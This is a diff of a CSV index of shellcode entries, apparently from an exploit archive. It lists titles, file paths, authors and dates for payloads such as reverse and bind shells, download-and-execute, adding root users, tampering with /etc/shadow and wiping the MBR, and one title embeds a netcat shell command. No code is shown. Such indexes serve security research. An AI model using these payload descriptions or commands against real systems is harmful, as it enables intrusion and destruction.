13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0
|
||||
13522,platforms/win_x86/shellcode/13522.c,"Win32 - Download & Exec Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0
|
||||
13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0
|
||||
13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0
|
||||
13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
|
||||
13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0
|
||||
13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0
|
||||
13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0
|
||||
13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)",2004-10-25,lion,win_x86,shellcode,0
|
||||
13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File and Exec Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0
|
||||
13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - download and exec source Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
|
||||
13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Portshell on port 58821 Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
|
||||
13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download & Exec Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
|
||||
13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Portshell Port 58821 Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
|
||||
13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0
|
||||
13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) download and execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0
|
||||
13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) Download & Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0
|
||||
13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - kill all processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0
|
||||
13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) & execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
|
||||
13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) and cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
|
||||
|
@ -15785,8 +15792,8 @@ id,file,description,date,author,platform,type,port
|
|||
13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0
|
||||
13565,platforms/win_x86/shellcode/13565.asm,"Win32 XP SP3 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0
|
||||
13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0
|
||||
13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0
|
||||
13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - portbind (Port 1337) Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0
|
||||
13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to Allow TCP Traffic on Port 445 Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0
|
||||
13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - Portbind Port 1337 Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0
|
||||
13571,platforms/win_x86/shellcode/13571.c,"Win32/XP SP2 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0
|
||||
13572,platforms/lin_x86/shellcode/13572.c,"Linux/x86 - unlink(/etc/passwd) & exit() Shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode,0
|
||||
13574,platforms/win_x86/shellcode/13574.c,"Win32/XP SP2 (EN + AR) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode,0
|
||||
|
@ -15794,25 +15801,25 @@ id,file,description,date,author,platform,type,port
|
|||
13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - break chroot Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0
|
||||
13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - fork bomb Shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0
|
||||
13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append '/etc/passwd' & exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0
|
||||
13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
|
||||
13582,platforms/windows/shellcode/13582.txt,"Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
|
||||
13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
|
||||
13582,platforms/windows/shellcode/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
|
||||
13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0
|
||||
13595,platforms/win_x86/shellcode/13595.c,"Win32 XP SP2 FR - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0
|
||||
13595,platforms/win_x86/shellcode/13595.c,"Win32 XP SP2 (FR) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0
|
||||
13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - polymorphic Shellcode ip6tables -F (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13601,platforms/lin_x86/shellcode/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13602,platforms/lin_x86/shellcode/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13609,platforms/lin_x86/shellcode/13609.c,"Linux/x86 - bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,lin_x86,shellcode,0
|
||||
13614,platforms/win_x86/shellcode/13614.c,"Win32 XP SP3 English - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
|
||||
13615,platforms/win_x86/shellcode/13615.c,"Win32 XP SP2 Turkish - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
|
||||
13614,platforms/win_x86/shellcode/13614.c,"Win32 XP SP3 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
|
||||
13615,platforms/win_x86/shellcode/13615.c,"Win32 XP SP2 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0
|
||||
13627,platforms/lin_x86/shellcode/13627.c,"Linux/x86 - /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode,0
|
||||
13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0
|
||||
13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home Edition SP2 English - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
|
||||
13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home Edition SP3 English - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
|
||||
13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
|
||||
13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
|
||||
13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0
|
||||
13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
|
||||
13636,platforms/win_x86/shellcode/13636.c,"Win32 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0
|
||||
13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 ITA - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
|
||||
13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
|
||||
13642,platforms/win_x86/shellcode/13642.txt,"Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0
|
||||
13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
|
||||
13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0
|
||||
|
@ -15835,7 +15842,7 @@ id,file,description,date,author,platform,type,port
|
|||
13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends 'Phuck3d!' to all terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0
|
||||
13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 FR - Download and Exec Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0
|
||||
13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 (FR) - Download & Exec Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0
|
||||
13702,platforms/lin_x86/shellcode/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13703,platforms/lin_x86/shellcode/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
|
||||
13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0
|
||||
|
@ -15845,7 +15852,7 @@ id,file,description,date,author,platform,type,port
|
|||
13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0
|
||||
13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0
|
||||
13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Pro SP1 64 FR - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0
|
||||
13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0
|
||||
13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - Polymorphic setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0
|
||||
13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
|
||||
13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
|
||||
|
@ -15859,14 +15866,14 @@ id,file,description,date,author,platform,type,port
|
|||
13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
|
||||
13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
|
||||
13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
|
||||
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
|
||||
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Netcat Connectback Port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
|
||||
13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0
|
||||
13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0
|
||||
13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
|
||||
13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Polymorphic Bindport 31337 with setreuid (0_0) Shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0
|
||||
13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
|
||||
13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0
|
||||
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
|
||||
13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password 'leet' Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0
|
||||
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 (SPA) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
|
||||
14116,platforms/arm/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0
|
||||
14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0
|
||||
|
@ -15875,47 +15882,47 @@ id,file,description,date,author,platform,type,port
|
|||
14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0
|
||||
14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0
|
||||
14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
|
||||
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - bind shell port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
|
||||
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell Port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
|
||||
14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0
|
||||
14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14234,platforms/linux/shellcode/14234.c,"Linux - 125 Bind Port 6778 XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14261,platforms/arm/shellcode/14261.c,"ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
|
||||
14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0
|
||||
14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0
|
||||
14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0
|
||||
14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
|
||||
14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
|
||||
14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Netcat BindShell Port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
|
||||
14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
|
||||
14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0
|
||||
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
|
||||
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bindshell Port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
|
||||
14873,platforms/win_x86/shellcode/14873.asm,"Win32 - Shellcode Checksum Routine (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0
|
||||
14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0
|
||||
15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Admin _zrl_ Account Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
|
||||
15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
|
||||
15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
|
||||
15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0
|
||||
15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Pro SP3 (EN) x86 - Add new local administrator _secuid0_ Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
|
||||
15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
|
||||
15314,platforms/arm/shellcode/15314.asm,"ARM - Bindshell port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
|
||||
15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
|
||||
15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
|
||||
15314,platforms/arm/shellcode/15314.asm,"ARM - Bindshell Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
|
||||
15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect UDP Port 68 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
|
||||
15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
|
||||
15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
|
||||
15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
|
||||
15618,platforms/osx/shellcode/15618.c,"OSX/Intel (x86-64) - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
|
||||
15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
|
||||
15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
|
||||
15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
|
||||
15879,platforms/win_x86/shellcode/15879.txt,"Win32 - Speaking 'You got pwned!' Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
|
||||
16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0
|
||||
16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 portbind + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0
|
||||
16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 Portbind + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0
|
||||
16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
|
||||
17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
|
||||
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Netcat BindShell Port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
|
||||
17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
|
||||
17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
|
||||
20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
|
||||
17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
|
||||
17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
|
||||
17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
|
||||
17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
|
||||
17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
|
||||
17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0
|
||||
17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
|
||||
|
@ -15924,7 +15931,7 @@ id,file,description,date,author,platform,type,port
|
|||
18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
|
||||
18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
|
||||
18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0
|
||||
